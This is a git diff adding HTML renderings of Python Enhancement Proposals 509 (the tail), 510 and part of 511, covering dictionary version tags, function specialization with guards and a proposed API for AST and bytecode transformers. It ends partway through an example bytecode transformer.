    $ python3.6 -m timeit -s 'd = {str(i):i for i in range(100)}' 'd["33"] == 33'
    +10000000 loops, best of 3: 0.0487 usec per loop
    +$ python3.6 -m timeit -s 'd = {str(i):i for i in range(100)}' 'd.__version__ == 100'
    +10000000 loops, best of 3: 0.0475 usec per loop
    +
    +
    +
  • +
  • The __version__ can wrap around on integer overflow. It is error +prone: using dict.__version__ <= guard_version is wrong; +dict.__version__ == guard_version must be used instead to reduce +the risk of bugs on integer overflow (even if an integer overflow is +unlikely in practice).
  • +
+

Mandatory bikeshedding on the property name:

+
    +
  • __cache_token__: name proposed by Alyssa Coghlan, name coming from +abc.get_cache_token().
  • +
  • __version__
  • +
  • __version_tag__
  • +
  • __timestamp__
  • +
+
+
+

Add a version to each dict entry

+

A single version per dictionary requires keeping a strong reference to +the value, which can keep the value alive longer than expected. If we also +add a version per dictionary entry, the guard can store only the entry +version (a simple integer) to avoid the strong reference to the value: +only strong references to the dictionary and to the key are needed.

+

Changes: add a me_version_tag field to the PyDictKeyEntry +structure, the field has the C type PY_UINT64_T. When a key is +created or modified, the entry version is set to the dictionary version +which is incremented at any change (create, modify, delete).

+

Pseudo-code of a fast guard to check if a dictionary key was modified +using hypothetical dict_get_version(dict) and +dict_get_entry_version(dict, key) functions:

+
UNSET = object()
+
+class GuardDictKey:
+    def __init__(self, dict, key):
+        self.dict = dict
+        self.key = key
+        self.dict_version = dict_get_version(dict)
+        self.entry_version = dict_get_entry_version(dict, key)
+
+    def check(self):
+        """Return True if the dictionary entry did not change
+        and the dictionary was not replaced."""
+
+        # read the version of the dictionary
+        dict_version = dict_get_version(self.dict)
+        if dict_version == self.dict_version:
+            # Fast-path: dictionary lookup avoided
+            return True
+
+        # lookup in the dictionary to read the entry version
+        entry_version = dict_get_entry_version(self.dict, self.key)
+        if entry_version == self.entry_version:
+            # another key was modified:
+            # cache the new dictionary version
+            self.dict_version = dict_version
+            self.entry_version = entry_version
+            return True
+
+        # the key was modified
+        return False
+
+
+

The main drawback of this option is the impact on the memory footprint. +It increases the size of each dictionary entry, so the overhead depends +on the number of buckets (dictionary entries, used or not used). For +example, it increases the size of each dictionary entry by 8 bytes on +64-bit systems.

+

In Python, the memory footprint matters and the trend is to reduce it. +Examples:

+
    +
  • PEP 393 – Flexible String Representation
  • +
  • PEP 412 – Key-Sharing Dictionary
  • +
+
+
+

Add a new dict subtype

+

Add a new verdict type, subtype of dict. When guards are needed, +use the verdict for namespaces (module namespace, type namespace, +instance namespace, etc.) instead of dict.

+

Leave the dict type unchanged to not add any overhead (CPU, memory +footprint) when guards are not used.

+

Technical issue: a lot of C code in the wild, including the CPython core, +expects the exact dict type. Issues:

+
    +
  • exec() requires a dict for globals and locals. A lot of code +uses globals={}. It is not possible to cast the dict to a +dict subtype because the caller expects the globals parameter +to be modified (dict is mutable).
  • +
  • C functions call PyDict_xxx() functions directly, instead of calling +PyObject_xxx(), even if the object is a dict subtype
  • +
  • the PyDict_CheckExact() check fails on dict subtypes, whereas some +functions require the exact dict type.
  • +
  • Python/ceval.c does not completely support dict subtypes for +namespaces
  • +
+

The exec() issue is a blocker issue.

+

Other issues:

+
    +
  • The garbage collector has a special code to “untrack” dict +instances. If a dict subtype is used for namespaces, the garbage +collector can be unable to break some reference cycles.
  • +
  • Some functions have a fast-path for dict which would not be taken +for dict subtypes, and so it would make Python a little bit +slower.
  • +
+
+
+
+

Prior Art

+
+

Method cache and type version tag

+

In 2007, Armin Rigo wrote a patch to implement a cache of methods. It +was merged into Python 2.6. The patch adds a “type attribute cache +version tag” (tp_version_tag) and a “valid version tag” flag to +types (the PyTypeObject structure).

+

The type version tag is not exposed at the Python level.

+

The version tag has the C type unsigned int. The cache is a global +hash table of 4096 entries, shared by all types. The cache is global to +“make it fast, have a deterministic and low memory footprint, and be +easy to invalidate”. Each cache entry has a version tag. A global +version tag is used to create the next version tag, it also has the C +type unsigned int.

+

By default, a type has its “valid version tag” flag cleared to indicate +that the version tag is invalid. When the first method of the type is +cached, the version tag and the “valid version tag” flag are set. When a +type is modified, the “valid version tag” flag of the type and its +subclasses is cleared. Later, when a cache entry of these types is used, +the entry is removed because its version tag is outdated.

+

On integer overflow, the whole cache is cleared and the global version +tag is reset to 0.

+

See Method cache (issue #1685986) and Armin’s method cache +optimization updated for Python 2.6 (issue #1700288).

+
+
+

Globals / builtins cache

+

In 2010, Antoine Pitrou proposed a Globals / builtins cache (issue +#10401) which adds a private +ma_version field to the PyDictObject structure (dict type), +the field has the C type Py_ssize_t.

+

The patch adds a “global and builtin cache” to functions and frames, and +changes LOAD_GLOBAL and STORE_GLOBAL instructions to use the +cache.

+

The change on the PyDictObject structure is very similar to this +PEP.

+
+
+

Cached globals+builtins lookup

+

In 2006, Andrea Griffini proposed a patch implementing a Cached +globals+builtins lookup optimization. The patch adds a private +timestamp field to the PyDictObject structure (dict type), +the field has the C type size_t.

+

Thread on python-dev: About dictionary lookup caching +(December 2006).

+
+
+

Guard against changing dict during iteration

+

In 2013, Serhiy Storchaka proposed Guard against changing dict during +iteration (issue #19332) which +adds a ma_count field to the PyDictObject structure (dict +type), the field has the C type size_t. This field is incremented +when the dictionary is modified.

+
+
+

PySizer

+

PySizer: a memory profiler for Python, +Google Summer of Code 2005 project by Nick Smallbone.

+

This project has a patch for CPython 2.4 which adds key_time and +value_time fields to dictionary entries. It uses a global +process-wide counter for dictionaries, incremented each time that a +dictionary is modified. The times are used to decide when child objects +first appeared in their parent objects.

+
+
+
+

Discussion

+

Thread on the mailing lists:

+ +
+
+

Acceptance

+

The PEP was accepted on 2016-09-07 by Guido van Rossum. +The PEP implementation has since been committed to the repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0509.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0510/index.html b/pep-0510/index.html new file mode 100644 index 00000000000..ad23c14fae3 --- /dev/null +++ b/pep-0510/index.html @@ -0,0 +1,584 @@ + + + + + + + + PEP 510 – Specialize functions with guards | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 510 – Specialize functions with guards

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Jan-2016
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP was rejected by its author since the design didn’t show any +significant speedup, but also because of the lack of time to implement +the most advanced and complex optimizations.

+
+
+

Abstract

+

Add functions to the Python C API to specialize pure Python functions: +add specialized codes with guards. This makes it possible to implement +static optimizers respecting the Python semantics.

+
+
+

Rationale

+
+

Python semantics

+

Python is hard to optimize because almost everything is mutable: builtin +functions, function code, global variables, local variables, … can be +modified at runtime. Implementing optimizations respecting the Python +semantics requires detecting when “something changes”; we will call these +checks “guards”.

+

This PEP proposes to add a public API to the Python C API to add +specialized codes with guards to a function. When the function is +called, a specialized code is used if nothing changed; otherwise the +original bytecode is used.

+

Even if guards help to respect most parts of the Python semantics, it’s +hard to optimize Python without making subtle changes to the exact +behaviour. CPython has a long history and many applications rely on +implementation details. A compromise must be found between “everything +is mutable” and performance.

+

Writing an optimizer is out of the scope of this PEP.

+
+
+

Why not a JIT compiler?

+

There are multiple JIT compilers for Python actively developed:

+ +

Numba is specific to numerical computation. Pyston and Pyjion are still +young. PyPy is the most complete Python interpreter, it is generally +faster than CPython in micro- and many macro-benchmarks and has very +good compatibility with CPython (it respects the Python semantics). +There are still issues with Python JIT compilers which prevent them from +being widely used instead of CPython.

+

Many popular libraries like numpy, PyGTK, PyQt, PySide and wxPython are +implemented in C or C++ and use the Python C API. To have a small memory +footprint and better performance, Python JIT compilers do not use +reference counting (relying instead on a faster garbage collector), do +not use the C structures of CPython objects and manage memory allocations +differently. PyPy has a cpyext module which emulates the Python C API, +but it has worse performance than CPython and does not support the full +Python C API.

+

New features are first developed in CPython. In January 2016, the +latest CPython stable version is 3.5, whereas PyPy only supports Python +2.7 and 3.2, and Pyston only supports Python 2.7.

+

Even if PyPy has a very good compatibility with Python, some modules are +still not compatible with PyPy: see PyPy Compatibility Wiki. The incomplete +support of the Python C API is part of this problem. There are also +subtle differences between PyPy and CPython like reference counting: +object destructors are always called in PyPy, but can be called “later” +than in CPython. Using context managers helps to control when resources +are released.

+

Even if PyPy is much faster than CPython in a wide range of benchmarks, +some users still report worse performance than CPython on some specific +use cases, or unstable performance.

+

When Python is used as a scripting language for programs running less +than 1 minute, JIT compilers can be slower because their startup time is +higher and the JIT compiler takes time to optimize the code. For +example, most Mercurial commands take a few seconds.

+

Numba now supports ahead-of-time compilation, but it requires a decorator +to specify argument types and it only supports numerical types.

+

CPython 3.5 has almost no optimization: the peephole optimizer only +implements basic optimizations. A static compiler is a compromise +between CPython 3.5 and PyPy.

+
+

Note

+

There was also the Unladen Swallow project, but it was abandoned in +2011.

+
+
+
+
+

Examples

+

The following examples are not written to show powerful optimizations +promising an important speedup, but to be short and easy to understand, +just to explain the principle.

+
+

Hypothetical myoptimizer module

+

Examples in this PEP use a hypothetical myoptimizer module which +provides the following functions and types:

+
    +
  • specialize(func, code, guards): add the specialized code code +with guards guards to the function func
  • +
  • get_specialized(func): get the list of specialized codes as a list +of (code, guards) tuples where code is a callable or code object +and guards is a list of guards
  • +
  • GuardBuiltins(name): guard watching for +builtins.__dict__[name] and globals()[name]. The guard fails +if builtins.__dict__[name] is replaced, or if globals()[name] +is set.
  • +
+
+
+

Using bytecode

+

Add specialized bytecode where the call to the pure builtin function +chr(65) is replaced with its result "A":

+
import myoptimizer
+
+def func():
+    return chr(65)
+
+def fast_func():
+    return "A"
+
+myoptimizer.specialize(func, fast_func.__code__,
+                       [myoptimizer.GuardBuiltins("chr")])
+del fast_func
+
+
+

Example showing the behaviour of the guard:

+
print("func(): %s" % func())
+print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
+print()
+
+import builtins
+builtins.chr = lambda obj: "mock"
+
+print("func(): %s" % func())
+print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
+
+
+

Output:

+
func(): A
+#specialized: 1
+
+func(): mock
+#specialized: 0
+
+
+

The first call uses the specialized bytecode which returns the string +"A". The second call removes the specialized code because the +builtin chr() function was replaced, and executes the original +bytecode calling chr(65).

+

On a microbenchmark, calling the specialized bytecode takes 88 ns, +whereas the original function takes 145 ns (+57 ns): 1.6 times as fast.

+
+
+

Using builtin function

+

Add the C builtin chr() function as the specialized code instead of +a bytecode calling chr(obj):

+
import myoptimizer
+
+def func(arg):
+    return chr(arg)
+
+myoptimizer.specialize(func, chr,
+                       [myoptimizer.GuardBuiltins("chr")])
+
+
+

Example showing the behaviour of the guard:

+
print("func(65): %s" % func(65))
+print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
+print()
+
+import builtins
+builtins.chr = lambda obj: "mock"
+
+print("func(65): %s" % func(65))
+print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
+
+
+

Output:

+
func(65): A
+#specialized: 1
+
+func(65): mock
+#specialized: 0
+
+
+

The first call calls the C builtin chr() function (without creating +a Python frame). The second call removes the specialized code because +the builtin chr() function was replaced, and executes the original +bytecode.

+

On a microbenchmark, calling the C builtin takes 95 ns, whereas the +original bytecode takes 155 ns (+60 ns): 1.6 times as fast. Calling +chr(65) directly takes 76 ns.

+
+
+
+

Choose the specialized code

+

Pseudo-code to choose the specialized code to call a pure Python +function:

+
def call_func(func, args, kwargs):
+    specialized = myoptimizer.get_specialized(func)
+    nspecialized = len(specialized)
+    index = 0
+    while index < nspecialized:
+        specialized_code, guards = specialized[index]
+
+        for guard in guards:
+            check = guard(args, kwargs)
+            if check:
+                break
+
+        if not check:
+            # all guards succeeded:
+            # use the specialized code
+            return specialized_code
+        elif check == 1:
+            # a guard failed temporarily:
+            # try the next specialized code
+            index += 1
+        else:
+            assert check == 2
+            # a guard will always fail:
+            # remove the specialized code
+            del specialized[index]
+            nspecialized -= 1
+
+    # if a guard of each specialized code failed, or if the function
+    # has no specialized code, use original bytecode
+    code = func.__code__
+
+
+
+
+

Changes

+

Changes to the Python C API:

+
    +
  • Add a PyFuncGuardObject object and a PyFuncGuard_Type type
  • +
  • Add a PySpecializedCode structure
  • +
  • Add the following fields to the PyFunctionObject structure:
    Py_ssize_t nb_specialized;
    +PySpecializedCode *specialized;
    +
    +
    +
  • +
  • Add function methods:
      +
    • PyFunction_Specialize()
    • +
    • PyFunction_GetSpecializedCodes()
    • +
    • PyFunction_GetSpecializedCode()
    • +
    • PyFunction_RemoveSpecialized()
    • +
    • PyFunction_RemoveAllSpecialized()
    • +
    +
  • +
+

None of these functions and types are exposed at the Python level.

+

All these additions are explicitly excluded from the stable ABI.

+

When a function code is replaced (func.__code__ = new_code), all +specialized codes and guards are removed.

+
+

Function guard

+

Add a function guard object:

+
typedef struct {
+    PyObject ob_base;
+    int (*init) (PyObject *guard, PyObject *func);
+    int (*check) (PyObject *guard, PyObject **stack, int na, int nk);
+} PyFuncGuardObject;
+
+
+

The init() function initializes a guard:

+
    +
  • Return 0 on success
  • +
  • Return 1 if the guard will always fail: PyFunction_Specialize() +must ignore the specialized code
  • +
  • Raise an exception and return -1 on error
  • +
+

The check() function checks a guard:

+
    +
  • Return 0 on success
  • +
  • Return 1 if the guard failed temporarily
  • +
  • Return 2 if the guard will always fail: the specialized code must +be removed
  • +
  • Raise an exception and return -1 on error
  • +
+

stack is an array of arguments: indexed arguments followed by (key, +value) pairs of keyword arguments. na is the number of indexed +arguments. nk is the number of keyword arguments: the number of (key, +value) pairs. stack contains na + nk * 2 objects.
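
To make this layout concrete, here is a hedged Python sketch of splitting such a stack back into positional and keyword arguments (the real API works on a C array of PyObject*; split_stack and the example values are purely illustrative):

+
def split_stack(stack, na, nk):
+    assert len(stack) == na + nk * 2
+    # indexed (positional) arguments come first ...
+    args = stack[:na]
+    # ... followed by nk (key, value) pairs of keyword arguments
+    kwargs = {stack[na + 2*i]: stack[na + 2*i + 1] for i in range(nk)}
+    return args, kwargs
+
+# f(1, 2, x=3) would be passed as stack=[1, 2, 'x', 3], na=2, nk=1
+args, kwargs = split_stack([1, 2, 'x', 3], 2, 1)   # ([1, 2], {'x': 3})
+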

+
+
+

Specialized code

+

Add a specialized code structure:

+
typedef struct {
+    PyObject *code;        /* callable or code object */
+    Py_ssize_t nb_guard;
+    PyObject **guards;     /* PyFuncGuardObject objects */
+} PySpecializedCode;
+
+
+
+
+

Function methods

+
+

PyFunction_Specialize

+

Add a function method to specialize the function by adding a specialized code with guards:

+
int PyFunction_Specialize(PyObject *func,
+                          PyObject *code, PyObject *guards)
+
+
+

If code is a Python function, the code object of the code function +is used as the specialized code. The specialized Python function must +have the same parameter defaults, the same keyword parameter defaults, +and must not have specialized code.

+

If code is a Python function or a code object, a new code object is +created and the code name and first line number of the code object of +func are copied. The specialized code must have the same cell +variables and the same free variables.

+

Result:

+
    +
  • Return 0 on success
  • +
  • Return 1 if the specialization has been ignored
  • +
  • Raise an exception and return -1 on error
  • +
+
+
+

PyFunction_GetSpecializedCodes

+

Add a function method to get the list of specialized codes:

+
PyObject* PyFunction_GetSpecializedCodes(PyObject *func)
+
+
+

Return a list of (code, guards) tuples where code is a callable or +code object and guards is a list of PyFuncGuard objects. Raise an +exception and return NULL on error.

+
+
+

PyFunction_GetSpecializedCode

+

Add a function method checking guards to choose a specialized code:

+
PyObject* PyFunction_GetSpecializedCode(PyObject *func,
+                                        PyObject **stack,
+                                        int na, int nk)
+
+
+

See check() function of guards for stack, na and nk arguments. +Return a callable or a code object on success. Raise an exception and +return NULL on error.

+
+
+

PyFunction_RemoveSpecialized

+

Add a function method to remove a specialized code with its guards by +its index:

+
int PyFunction_RemoveSpecialized(PyObject *func, Py_ssize_t index)
+
+
+

Return 0 on success or if the index does not exist. Raise an exception and +return -1 on error.

+
+
+

PyFunction_RemoveAllSpecialized

+

Add a function method to remove all specialized codes and guards of a +function:

+
int PyFunction_RemoveAllSpecialized(PyObject *func)
+
+
+

Return 0 on success. Raise an exception and return -1 if func is not +a function.

+
+
+
+

Benchmark

+

Microbenchmark on python3.6 -m timeit -s 'def f(): pass' 'f()' (best +of 3 runs):

+
    +
  • Original Python: 79 ns
  • +
  • Patched Python: 79 ns
  • +
+

According to this microbenchmark, the changes have no overhead when calling a Python function without specialization.

+
+
+
+

Implementation

+

Issue #26098 (PEP 510: Specialize functions with guards) contains a patch which implements this PEP.

+
+
+

Other implementations of Python

+

This PEP only contains changes to the Python C API; the Python API is unchanged. Other implementations of Python are free not to implement the new additions, or to implement the added functions as no-ops:

+
    +
  • PyFunction_Specialize(): always return 1 (the specialization +has been ignored)
  • +
  • PyFunction_GetSpecializedCodes(): always return an empty list
  • +
  • PyFunction_GetSpecializedCode(): return the function code object, +as the existing PyFunction_GET_CODE() macro
  • +
+
+
+

Discussion

+

Thread on the python-ideas mailing list: RFC: PEP: Specialized +functions with guards.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0510.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0511/index.html b/pep-0511/index.html new file mode 100644 index 00000000000..6d1f90927a7 --- /dev/null +++ b/pep-0511/index.html @@ -0,0 +1,757 @@ + PEP 511 – API for code transformers | peps.python.org +
+
+


+ + +
+
+
+

PEP 511 – API for code transformers

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Jan-2016
+
Python-Version:
+
3.6
+
+
+
+
+
+

Rejection Notice

+

This PEP was rejected by its author.

+

This PEP was seen as blessing new Python-like programming languages +which are close but incompatible with the regular Python language. It +was decided to not promote syntaxes incompatible with Python.

+

This PEP was also seen as a nice tool to experiment with new Python features, but it is already possible to experiment with them without the PEP, using only importlib hooks. If a feature becomes useful, it should be made part of Python directly, instead of depending on a third-party Python module.

+

Finally, this PEP was driven by the FAT Python optimization project, which was abandoned in 2016 since it was not possible to show any significant speedup, but also because of the lack of time to implement the most advanced and complex optimizations.

+
+
+

Abstract

+

Propose an API to register bytecode and AST transformers. Also add a -o OPTIM_TAG command line option to change .pyc filenames; -o noopt disables the peephole optimizer. Raise an ImportError exception on import if the .pyc file is missing and the code transformers required to transform the code are missing. Code transformers are not needed to execute code transformed ahead of time (loaded from .pyc files).

+
+
+

Rationale

+

Python does not provide a standard way to transform the code. Projects +transforming the code use various hooks. The MacroPy project uses an +import hook: it adds its own module finder in sys.meta_path to +hook its AST transformer. Another option is to monkey-patch the +builtin compile() function. There are even more options to +hook a code transformer.
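
As a rough illustration of the monkey-patching option, the sketch below wraps the builtin compile() so that an AST transformer runs before the actual compilation (IdentityTransformer is a hypothetical stand-in for a real transformer; this is not part of the proposed API):

+
import ast
+import builtins
+
+class IdentityTransformer(ast.NodeTransformer):
+    # stand-in for a real transformer: leaves the tree unchanged
+    pass
+
+_real_compile = builtins.compile
+
+def hooked_compile(source, filename, mode, flags=0,
+                   dont_inherit=False, optimize=-1):
+    # parse to an AST, transform it, then compile the transformed tree
+    if isinstance(source, str) and not flags & ast.PyCF_ONLY_AST:
+        tree = _real_compile(source, filename, mode,
+                             flags | ast.PyCF_ONLY_AST, dont_inherit, optimize)
+        source = IdentityTransformer().visit(tree)
+    return _real_compile(source, filename, mode, flags, dont_inherit, optimize)
+
+builtins.compile = hooked_compile
+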

+

Python 3.4 added a source_to_code() method to importlib.abc.SourceLoader. But code transformation is wider than just importing modules; see the use cases described below.

+

Writing an optimizer or a preprocessor is out of the scope of this PEP.

+
+

Usage 1: AST optimizer

+

Transforming an Abstract Syntax Tree (AST) is a convenient way to implement an optimizer. It’s easier to work on the AST than on the bytecode: the AST contains more information and is higher level.

+

Since the optimization can be done ahead of time, complex but slow optimizations can be implemented.

+

Example of optimizations which can be implemented with an AST optimizer:

+ +
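
As a concrete illustration of one such optimization, here is a hedged sketch of a minimal constant-folding AST transformer (it only handles binary + on number literals, using the 3.6-era ast.Num node):

+
import ast
+
+class ConstantFolder(ast.NodeTransformer):
+    # fold `1 + 2` into `3`; only binary + on number literals is handled
+    def visit_BinOp(self, node):
+        self.generic_visit(node)   # fold children first
+        if (isinstance(node.op, ast.Add)
+                and isinstance(node.left, ast.Num)
+                and isinstance(node.right, ast.Num)):
+            return ast.copy_location(ast.Num(n=node.left.n + node.right.n),
+                                     node)
+        return node
+
+tree = ast.parse("x = 1 + 2 + 3")
+tree = ast.fix_missing_locations(ConstantFolder().visit(tree))
+ns = {}
+exec(compile(tree, "<folded>", "exec"), ns)
+print(ns["x"])   # 6
+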

Using guards (see PEP 510), it is possible to +implement a much wider choice of optimizations. Examples:

+ +

The following issues can be implemented with an AST optimizer:

+
    +
  • Issue #1346238: A constant folding +optimization pass for the AST
  • +
  • Issue #2181: +optimize out local variables at end of function
  • +
  • Issue #2499: +Fold unary + and not on constants
  • +
  • Issue #4264: +Patch: optimize code to use LIST_APPEND instead of calling list.append
  • +
  • Issue #7682: +Optimisation of if with constant expression
  • +
  • Issue #10399: AST +Optimization: inlining of function calls
  • +
  • Issue #11549: +Build-out an AST optimizer, moving some functionality out of the +peephole optimizer
  • +
  • Issue #17068: +peephole optimization for constant strings
  • +
  • Issue #17430: +missed peephole optimization
  • +
+
+
+

Usage 2: Preprocessor

+

A preprocessor can be easily implemented with an AST transformer. A preprocessor has many different uses.

+

Some examples:

+ +

MacroPy has a long list of +examples and use cases.

+

This PEP does not add any new code transformer. Using a code transformer requires installing an external module and registering it manually.

+

See also PyXfuscator: Python +obfuscator, deobfuscator, and user-assisted decompiler.

+
+
+

Usage 3: Disable all optimization

+

Ned Batchelder asked to add an option to disable the peephole optimizer +because it makes code coverage more difficult to implement. See the +discussion on the python-ideas mailing list: Disable all peephole +optimizations.

+

This PEP adds a new -o noopt command line option to disable the +peephole optimizer. In Python, it’s as easy as:

+
sys.set_code_transformers([])
+
+
+

It will fix Issue #2506: Add mechanism to disable optimizations.

+
+
+

Usage 4: Write new bytecode optimizers in Python

+

Python 3.6 optimizes the code using a peephole optimizer. By definition, a peephole optimizer has a narrow view of the code and so can only implement basic optimizations. The optimizer rewrites the bytecode. It is difficult to enhance, because it is written in C.

+

With this PEP, it becomes possible to implement a new bytecode optimizer +in pure Python and experiment new optimizations.

+

Some optimizations are easier to implement on the AST like constant +folding, but optimizations on the bytecode are still useful. For +example, when the AST is compiled to bytecode, useless jumps can be +emitted because the compiler is naive and does not try to optimize +anything.

+
+
+
+

Use Cases

+

This section gives examples of use cases explaining when and how code transformers will be used.

+
+

Interactive interpreter

+

It will be possible to use code transformers with the interactive +interpreter which is popular in Python and commonly used to demonstrate +Python.

+

The code is transformed at runtime and so the interpreter can be slower +when expensive code transformers are used.

+
+
+

Build a transformed package

+

It will be possible to build a package of the transformed code.

+

A transformer can have a configuration. The configuration is not stored +in the package.

+

All .pyc files of the package must be transformed with the same code +transformers and the same transformers configuration.

+

It is possible to build different .pyc files using different +optimizer tags. Example: fat for the default configuration and +fat_inline for a different configuration with function inlining +enabled.

+

A package can contain .pyc files with different optimizer tags.

+
+
+

Install a package containing transformed .pyc files

+

It will be possible to install a package which contains transformed +.pyc files.

+

All .pyc files with any optimizer tag contained in the package are +installed, not only for the current optimizer tag.

+
+
+

Build .pyc files when installing a package

+

If a package does not contain any .pyc files for the current optimizer tag (or some .pyc files are missing), the .pyc files are created during the installation.

+

Code transformers of the optimizer tag are required. Otherwise, the +installation fails with an error.

+
+
+

Execute transformed code

+

It will be possible to execute transformed code.

+

Raise an ImportError exception on import if the .pyc file of the +current optimizer tag is missing and the code transformers required to +transform the code are missing.

+

The interesting point here is that code transformers are not needed to +execute the transformed code if all required .pyc files are already +available.

+
+
+
+

Code transformer API

+

A code transformer is a class with ast_transformer() and/or +code_transformer() methods (API described below) and a name +attribute.

+

For efficiency, do not define a code_transformer() or +ast_transformer() method if it does nothing.

+

The name attribute (str) must be a short string used to identify an optimizer. It is used to build a .pyc filename. The name must not contain dots ('.'), dashes ('-') or directory separators: dots are used to separate fields in a .pyc filename, and dashes are used to join code transformer names to build the optimizer tag.
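
A hedged sketch of that naming rule (check_transformer_name is illustrative and not part of the proposed API):

+
import re
+
+def check_transformer_name(name):
+    # reject dots, dashes and directory separators, per the rule above
+    if not re.fullmatch(r"[^.\-/\\]+", name):
+        raise ValueError("invalid code transformer name: %r" % name)
+    return name
+
+check_transformer_name("fat")          # ok
+# check_transformer_name("fat-inline") would raise ValueError
+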

+
+

Note

+

It would be nice to pass the fully qualified name of a module in the +context when an AST transformer is used to transform a module on +import, but it looks like the information is not available in +PyParser_ASTFromStringObject().

+
+
+

code_transformer() method

+

Prototype:

+
def code_transformer(self, code, context):
+    ...
+    new_code = ...
+    ...
+    return new_code
+
+
+

Parameters:

+
    +
  • code: code object
  • +
  • context: an object with an optimize attribute (int), the optimization +level (0, 1 or 2). The value of the optimize attribute comes from the +optimize parameter of the compile() function, it is equal to +sys.flags.optimize by default.
  • +
+

Each implementation of Python can add extra attributes to context. For +example, on CPython, context will also have the following attribute:

+
    +
  • interactive (bool): true if in interactive mode
  • +
+

XXX add more flags?

+

XXX replace flags int with a sub-namespace, or with specific attributes?

+

The method must return a code object.

+

The code transformer is run after the compilation to bytecode.

+
+
+

ast_transformer() method

+

Prototype:

+
def ast_transformer(self, tree, context):
+    ...
+    return tree
+
+
+

Parameters:

+
    +
  • tree: an AST tree
  • +
  • context: an object with a filename attribute (str)
  • +
+

It must return an AST tree. It can modify the AST tree in place, or +create a new AST tree.

+

The AST transformer is called after the creation of the AST by the +parser and before the compilation to bytecode. New attributes may be +added to context in the future.

+
+
+
+

Changes

+

In short, add:

+
    +
  • -o OPTIM_TAG command line option
  • +
  • sys.implementation.optim_tag
  • +
  • sys.get_code_transformers()
  • +
  • sys.set_code_transformers(transformers)
  • +
  • ast.PyCF_TRANSFORMED_AST
  • +
+
+

API to get/set code transformers

+

Add new functions to register code transformers:

+
    +
  • sys.set_code_transformers(transformers): set the list of code +transformers and update sys.implementation.optim_tag
  • +
  • sys.get_code_transformers(): get the list of code +transformers.
  • +
+

The order of code transformers matters. Running transformer A and then transformer B can give a different output than running transformer B and then transformer A.

+

Example to prepend a new code transformer:

+
transformers = sys.get_code_transformers()
+transformers.insert(0, new_cool_transformer)
+sys.set_code_transformers(transformers)
+
+
+

All AST transformers are run sequentially (i.e. the second transformer receives the output of the first), and then all bytecode transformers are run sequentially.

+
+
+

Optimizer tag

+

Changes:

+
    +
  • Add sys.implementation.optim_tag (str): optimization tag. +The default optimization tag is 'opt'.
  • +
  • Add a new -o OPTIM_TAG command line option to set +sys.implementation.optim_tag.
  • +
+

Changes to importlib:

+
    +
• importlib uses sys.implementation.optim_tag to build the .pyc filename when importing modules, instead of always using opt. The special case for optimization level 0 with the default optimizer tag 'opt' is also removed, to simplify the code.
  • +
• When loading a module, if the .pyc file is missing but the .py is available, the .py is only used if the code optimizers have the same optimizer tag as the current tag; otherwise an ImportError exception is raised.
  • +
+

Pseudo-code of a use_py() function to decide if a .py file can +be compiled to import a module:

+
def transformers_tag():
+    transformers = sys.get_code_transformers()
+    if not transformers:
+        return 'noopt'
+    return '-'.join(transformer.name
+                    for transformer in transformers)
+
+def use_py():
+    return (transformers_tag() == sys.implementation.optim_tag)
+
+
+

The order of sys.get_code_transformers() matters. For example, the fat transformer followed by the pythran transformer gives the optimizer tag fat-pythran.

+

The behaviour of the importlib module is unchanged with the default +optimizer tag ('opt').

+
+
+

Peephole optimizer

+

By default, sys.implementation.optim_tag is opt and +sys.get_code_transformers() returns a list of one code transformer: +the peephole optimizer (optimize the bytecode).

+

Use -o noopt to disable the peephole optimizer. In this case, the +optimizer tag is noopt and no code transformer is registered.

+

Using the -o opt option has no effect.

+
+
+

AST enhancements

+

Enhancements to simplify the implementation of AST transformers:

+
    +
• Add a new compiler flag PyCF_TRANSFORMED_AST to get the transformed AST. PyCF_ONLY_AST returns the AST before the transformers (see the sketch below).
  • +
+
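
A hedged sketch of how the two flags would differ (PyCF_TRANSFORMED_AST is the flag proposed by this PEP; it does not exist in released CPython):

+
import ast
+
+source = "print('Hello World!')"
+
+# existing behaviour: AST before any registered transformer has run
+raw_tree = compile(source, "<string>", "exec", flags=ast.PyCF_ONLY_AST)
+
+# proposed behaviour: AST after all registered AST transformers have run
+transformed_tree = compile(source, "<string>", "exec",
+                           flags=ast.PyCF_TRANSFORMED_AST)
+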
+
+
+

Examples

+
+

.pyc filenames

+

Example of .pyc filenames of the os module.

+

With the default optimizer tag 'opt':

+ + + + + + + + + + + + + + + + + +
.pyc filename             Optimization level
os.cpython-36.opt-0.pyc   0
os.cpython-36.opt-1.pyc   1
os.cpython-36.opt-2.pyc   2
+

With the 'fat' optimizer tag:

+ + + + + + + + + + + + + + + + + +
.pyc filename             Optimization level
os.cpython-36.fat-0.pyc   0
os.cpython-36.fat-1.pyc   1
os.cpython-36.fat-2.pyc   2
+
+
+

Bytecode transformer

+

Scary bytecode transformer replacing all strings with +"Ni! Ni! Ni!":

+
import sys
+import types
+
+class BytecodeTransformer:
+    name = "knights_who_say_ni"
+
+    def code_transformer(self, code, context):
+        consts = ['Ni! Ni! Ni!' if isinstance(const, str) else const
+                  for const in code.co_consts]
+        return types.CodeType(code.co_argcount,
+                              code.co_kwonlyargcount,
+                              code.co_nlocals,
+                              code.co_stacksize,
+                              code.co_flags,
+                              code.co_code,
+                              tuple(consts),
+                              code.co_names,
+                              code.co_varnames,
+                              code.co_filename,
+                              code.co_name,
+                              code.co_firstlineno,
+                              code.co_lnotab,
+                              code.co_freevars,
